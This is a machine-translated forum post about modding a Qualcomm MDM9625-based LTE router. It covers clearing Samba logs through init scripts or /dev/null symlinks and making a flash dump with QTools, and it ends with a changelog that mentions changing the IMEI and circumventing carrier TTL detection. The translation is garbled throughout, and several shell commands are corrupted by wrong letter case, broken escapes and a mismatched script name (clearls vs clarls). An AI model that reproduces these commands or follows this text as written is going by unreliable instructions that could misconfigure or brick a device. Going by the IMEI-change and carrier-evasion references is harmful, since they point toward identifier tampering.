/var/log.nmbd. Related to the initialization of the Samba, the initial entry in it dated 2015 (Date of purchase and first inclusion), size more than 6 MB, this file is not limited in its size, not cleared by the system and is not overwritten, everything is not only added to the addition. Linking it on the USB flash drive, just did not remove the log, only completely cleaned him and restarted the router. It took off as a plane, quickly rebooted, passed and distributed WiFi. This is such an unpleasant picture. I decided to watch him a couple - the top three days, then add the cleaning of this log when the router is turned on. Unlimited file growth occurs only if in
Storage Sharing Selected mode -
by wi-fi . Cleaning the log at the work of Samba did not affect.
To automatically clean the log, I advise you to make the following (for myself I chose the 3rd method proposed
mesb ):
First way :
If you use my TTL fixation scripts and / or the output of information in the muzzle of the router, then in
one From files /etc/init.d/infoshow or /etc/init.d/ttlset Add lines:
Echo -N.>/var/log.nmbd.
Echo -N.>/var/log.smbd.
Second way :
If you do not use foreign scripts with autorun, then create a new one that will clean the log:
root @ MDM9625: / # ECHO -E "#! / BIN / SH \ Necho -N>/var/log.nmbd\necho -N.>/var/log.smbd ">/etc/init.d/clearls.
root @ mdm9625: / # chmod 777 /etc/init.d/clearls
root @ mdm9625: / # ln -s /etc/init.d/clarls /etc/rc5.d/s99clearls
In this case, every time, after rebooting, the log will be cleaned.
Third way :
Suggested our forumchanin
mesb cd / var
Rm log.smbd.
Rm log.nmbd.
LN -S / DEV / NULL LOG.SMBD
LN -S / DEV / NULL log.nmbd
"Watch the result of LS -LAH we will see the sympti on the well.
After this action, the router is loaded norms and responds by sambe) "
Script-lacy teams from the post
mesb - Once the Del_smblog script from the del_smblog.tar archive and you can delete them from the router:
del_smblog.tar(2 KB)
Reset to factory settings
Router when resetting it to factory settings from a web muzzle or a reset button on it, only the settings are installed in the web interface and the web server itself, the remaining system remains as it was, i.e. All that has been done and changed in the system with handles (additional utilities, scripts) remain in place. Refracting to the current I ask, also does not affect the added change
All actions with your device you do at your own risk, be very accurate with the file system, it is very easy to get a brick instead of a working device.
The author does not bear any responsibility for your actions.
The IMEI change description on the device has an informational nature.
To create a dump:
Klavkom drivers must be installed!
1. Transfer the router in
PBL mode (without battery, shorten the specified points and connect to the computer via USB);
2. Unpack a folder with QTools to the root of the disk;
3. Run out of it -
_TP7350.cmd. ;
4. Inquiries twice enter the port number -
Qualcomm HS-USB QDLoader ... ;
5. Dump Solives you on the computer.
Qtools.zip.(2.98 MB)
Thank you very much
portax Blood changes:
04.05.2020 - Added a method for performing an AT-Command from SSH;
05.05.2020 - Running the FTP server on the router;
05.05.2020 - Added another way to perform an AT-Command from SSH;
05/08/2020 - Replaced IMEI router - I will describe the process later;
05/11/2020 - Tested and added to the post Shellinabox;
05/12/2020 - Added qterminal to perform AT commands from SHH;
05/18/2020 - Added infe-output scripts to a router face;
05/26/2020 - Changed Fix TTL on scripts with autoload and periodic fix check;
05/26/2020 - changed the imaging scripts to the muzzle of the router;
05/26/2020 - Added a simple method for obtaining primary access via Telnet using CURL;
05/30/2020 - changed the scripts of the output of information into the muzzle of the router - Displays the running OpenVPN;
05/30/2020 - Added an OpenVPN client recycled to our router;
05/30/2020 - Added the start / disable OpenVPN with the WPS button, via EvCheck;
05/30/2020 - Added a lightweight info output script to the screen, without signals;
06/01/2020 - Added a script-lazy to "zeroing" samba logs;
06/01/2020 - Changed TTL fixation scripts - got rid of one cyclically rewritable file;
06/01/2020 - changed the output scripts to the router screen - got rid of cyclically rewritable files and correct operation on V3;
06/01/2020 - added a description of the change of IMEI;
06/01/2020 - added a description of the creation of a dump;
02.06.2020 - corrected the successful references by the post;
05.06.2020 - made a script output information about the router in a web interface, link in content;
06/07/2020 - Added a description of the installation of additional software on the router, using the OPKG batch manager from the project - ENTWARE, LINK in the content;
11.06.2020 - added a simple method for obtaining primary access via Telnet via HTML;
12.06.2020 - Cross compilation - collect the necessary nucleus modules themselves, reference in the description;
06/15/2020 - added two proven method of operation of the router without battery;
07/09/2020 - Added Russian Localization of the Web Server for V1, link in the description;
07/18/2020 - Added a description of the Speedtest launch with the selected Server user;
08.08.2020 - Added a new router information output script to the web interface, info was added about IP and GEO information, link in content;
08.08.2020 - checked the work of CURL on the router, the link in the content;
08/09/2020 - Sending USSD requests from the console, in content;
08.26.2020 - compiled aha, link in content;
08/31/2020 - Updated the display of information about the router information in the web interface, added USSD, AT-Commands, painted info, link in content.
Post has been editedSerbli - 04.10.20, 22:05Reason for editing: Updated